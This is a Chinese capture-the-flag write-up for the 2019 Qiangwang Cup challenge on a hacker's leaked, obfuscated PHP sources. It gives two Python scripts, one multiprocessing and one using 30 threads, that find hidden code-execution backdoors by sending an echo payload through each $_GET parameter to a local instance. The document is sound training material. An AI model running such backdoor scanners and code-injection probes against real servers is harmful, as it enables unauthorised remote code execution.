
[强网杯 2019]高明的黑客

作者:互联网

提示有源码泄露

下载下来后,发现有3000多个文件,做了大量的混淆
推测其中混有可以执行传入代码的 php 文件

嫖一个一叶飘零大佬的脚本
大致思路是:从每个文件里找出 $_GET[] 中的参数名,然后把一段 PHP 代码作为该参数的值发过去,例如 ?a=echo "sky cool";,如果响应中出现 sky cool,则说明该文件能执行传入的代码

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"   # local challenge instance; exp() appends the file name to it
base_dir = "/Desktop/site/src/"           # local copy of the leaked sources, read by extracts()
# NOTE: the list is abbreviated in the writeup ("........"); the second script builds it with os.listdir()
file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']

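def extracts(f, directory=None):
    """Return the names used as $_GET['...'] keys in the PHP file *f*.

    Args:
        f: file name, appended to *directory*.
        directory: directory prefix to read from; defaults to the
            module-level ``base_dir`` so existing callers are unchanged.

    Returns:
        list of key names in file order. A line may contribute several
        keys; a key with no closing quote is skipped.

    Raises:
        IOError/OSError if the file cannot be opened.
    """
    if directory is None:
        directory = base_dir
    marker = "$_GET['"
    gets = []
    with open(directory + f, 'r') as fh:
        for raw in fh:
            line = raw.strip()
            pos = line.find(marker)
            # find() returns -1 when absent; the original "> 0" test also
            # dropped a key that starts at column 0 and took only the first
            # key on each line.
            while pos != -1:
                start = pos + len(marker)
                stop = line.find("'", start)
                if stop == -1:
                    break
                gets.append(line[start:stop])
                pos = line.find(marker, stop)
    return gets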

def exp(start, end):
    """Probe file_list[start:end] and print the URL of each file that echoes the marker.

    For every file the $_GET keys returned by extracts() are tried in
    turn; the first response containing the marker ends the search for
    that file. The closing "not found" line is printed unconditionally,
    exactly as in the original.
    """
    payload = 'echo "sky cool";'
    for index in range(start, end):
        name = file_list[index]
        keys = extracts(name)
        print("try: %s" % name)
        for key in keys:
            probe = "%s%s?%s=%s" % (base_url, name, key, payload)
            response = requests.get(probe)
            # NOTE: .content is str on Python 2 (this script's target); on
            # Python 3 it is bytes and this test would raise TypeError.
            if 'sky cool' in response.content:
                print(probe)
                break
    print("%s~%s not found!" % (start, end))


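def main(processes=15):
    """Scan file_list with a pool of worker processes.

    Args:
        processes: pool size and number of equal chunks; a remainder gets
            one extra, shorter chunk.

    The original used ``len(file_list)/15`` as the range step: that is a
    float on Python 3, and when the length is not divisible by 15 the
    final chunk ran past the list (IndexError in exp(), silently dropped
    because apply_async() results were never collected). Results are now
    collected so worker exceptions surface here.
    """
    total = len(file_list)
    # integer division keeps range() happy on Python 3; never a zero step
    chunk = max(1, total // processes)
    pool = Pool(processes=processes)
    try:
        results = [
            pool.apply_async(exp, (start, min(start + chunk, total)))
            for start in range(0, total, chunk)
        ]
        pool.close()
        # .get() re-raises anything the worker raised
        for res in results:
            res.get()
    finally:
        pool.close()
        pool.join()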

 
# entry-point guard: importing this module (multiprocessing workers do so on
# spawn-based platforms) must not start another scan
if __name__ == "__main__":
    main()

大佬用的多进程,我自己尝试使用多线程,开30个线程跑

# coding:utf-8
import requests
import os
import threading
import time

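base_url = "http://localhost/www/src/"   # local challenge instance
base_dir = "www/src/"                    # local copy of the leaked sources
# file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']


# os.listdir() also returns sub-directories, and GetShell.run() opens every
# entry it is given, so keep regular files only; sorting makes the per-thread
# split reproducible between runs.
file_list = sorted(
    name for name in os.listdir(base_dir)
    if os.path.isfile(os.path.join(base_dir, name))
)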


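class GetShell(threading.Thread):
    """Worker thread that probes file_list[begin:end] against the local instance.

    Each file is scanned for $_GET['...'] keys; every key is sent with the
    marker payload and the first URL whose response echoes the marker is
    printed for that file.
    """

    MARKER = "$_GET['"
    PAYLOAD = 'echo "sky cool";'

    def __init__(self, begin, end, base_url, base_dir, file_list):
        # explicit form so the class also works on Python 2
        super(GetShell, self).__init__()
        self.begin = begin
        self.end = end
        self.file_list = file_list
        self.base_dir = base_dir
        self.base_url = base_url

    @staticmethod
    def extract_gets(lines):
        """Return every $_GET key found in *lines*, in order.

        The original ``line.find(...) > 0`` test skipped a key at column 0
        and only took the first key on each line; both are handled here.
        A key with no closing quote is ignored.
        """
        marker = GetShell.MARKER
        gets = []
        for raw in lines:
            line = raw.strip()
            pos = line.find(marker)
            while pos != -1:
                start = pos + len(marker)
                stop = line.find("'", start)
                if stop == -1:
                    break
                gets.append(line[start:stop])
                pos = line.find(marker, stop)
        return gets

    def run(self):
        # clamp so a caller-supplied end past the list cannot raise IndexError
        stop = min(self.end, len(self.file_list))
        for index in range(self.begin, stop):
            filename = self.file_list[index]
            with open(self.base_dir + filename, 'r') as f:
                gets = self.extract_gets(f)
            print("try: %s" % filename)
            for get in gets:
                now_url = "%s%s?%s=%s" % (self.base_url, filename, get, self.PAYLOAD)
                r = requests.get(now_url)
                # .text is decoded on both Python versions; .content is bytes
                # on Python 3 and the substring test would raise TypeError
                if 'sky cool' in r.text:
                    print(now_url)
                    break
        print("%s~%s not found!" % (self.begin, self.end))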


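threads = []
thread_count = 30
total = len(file_list)
# integer division: len(file_list)/30 is a float on Python 3, and truncating
# the chunk size used to leave the trailing len(file_list) % 30 files
# unscanned -- the last thread now takes the remainder.
chunk = max(1, total // thread_count)
for i in range(thread_count):
    begin = i * chunk
    end = total if i == thread_count - 1 else min((i + 1) * chunk, total)
    threads.append(GetShell(begin, end, base_url, base_dir, file_list))

for t in threads:
    t.start()
for t in threads:
    t.join()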

花了一个半钟头

执行一下

获取flag

参考
https://skysec.top/2019/05/25/2019-强网杯online-Web-Writeup/#高明的黑客

来源: https://www.cnblogs.com/h3ng/p/14375288.html